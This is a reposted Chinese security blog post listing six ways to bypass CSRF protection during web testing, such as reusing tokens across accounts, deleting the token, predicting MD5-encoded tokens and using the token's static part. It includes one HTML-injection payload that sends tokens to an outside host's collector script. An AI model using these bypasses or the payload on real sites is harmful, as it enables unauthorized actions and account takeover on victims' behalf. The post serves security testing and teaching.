干货 | 绕过CSRF保护的6种方法总结

admin 2023年1月30日19:20:13评论71 views字数 1097阅读3分39秒阅读模式

绕过 CSRF 保护的 6 种方法

你们都知道CSRF是什么,今天在本文中,我将解释测试网站CSRF保护的四个简单测试,这些测试可能绕过CSRF保护

干货 | 绕过CSRF保护的6种方法总结

1.跨账户使用 CSRF 令牌

最简单和最致命的CSRF绕过是当应用程序不验证CSRF令牌是否绑定到特定帐户并且仅验证算法时。验证这一点

从账户 A 登录应用程序

转到其密码更改页面

使用Burpsuite捕获 CSRF 令牌

使用帐户 B 注销和登录

转到密码更改页面并拦截该请求

替换 CSRF 令牌

2. 相同长度的替换值

另一种技术是找到该标记的长度,例如,它是变量下的 32 个字符的字母数字标记,authenticity_token替换相同的变量,其他 32 个字符的值

例如,令牌是ud019eh10923213213123,您可以将其替换为相同值的令牌。

3. 从请求中完全删除 CSRF 令牌

这种技术通常适用于帐户删除功能,其中令牌根本不经过验证,使攻击者具有通过CSRF删除任何用户帐户的优势。

但我发现它也可以在其他功能上使用。很简单,您使用burpsuite拦截请求并从整个中删除令牌,我测试过的应用程序中有40%被发现容易受到这种技术的攻击

4. 解码 CSRF token

绕过 CSRF 的另一种方法是识别 CSRF 令牌的算法。

根据我的经验,CSRF 令牌是 MD5 或 Base64 编码值。可以解码该值并在该算法中对下一个值进行编码,并使用该令牌。

例如“a0a080f42e6f13b3a2df133f073095dd”是MD5(122)。也可以类似地加密下一个值 MD5(123) 到 CSRF 令牌绕过。

5. 通过 HTML 注入提取令牌

此技术利用 HTML 注入漏洞,攻击者可以利用该漏洞植入记录器,从该网页中提取 CSRF 令牌并使用该令牌。攻击者可以植入链接,例如

<form action=“http://shahmeeramir.com/acquire_token.php”></textarea>

6. 仅使用令牌的静态部分

CSRF token由两部分组成。静态部件和动态部件。

考虑两个CSRF令牌shahmeer742498h989889shahmeer7424ashda099s。大多数情况下,如果使用令牌的静态部分作为shahmeer7424,则可以使用该令牌

干货 | 绕过CSRF保护的6种方法总结

推荐阅读


实战 | 记一次渗透拿下某儿童色情网站的经过


实战 | 某某街一处XSS的绕过思路


实战 | 记一次企业钓鱼演练


2022年,从现在开始学安全还不迟!


干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试


星球部分精华内容推荐

干货 | 绕过CSRF保护的6种方法总结


干货 | 绕过CSRF保护的6种方法总结


干货 | 绕过CSRF保护的6种方法总结

其他更多精彩内容,欢迎加入我们的星球

干货 | 绕过CSRF保护的6种方法总结


原文始发于微信公众号(HACK学习君):干货 | 绕过CSRF保护的6种方法总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月30日19:20:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货 | 绕过CSRF保护的6种方法总结https://cn-sec.com/archives/1381785.html

发表评论

匿名网友 填写信息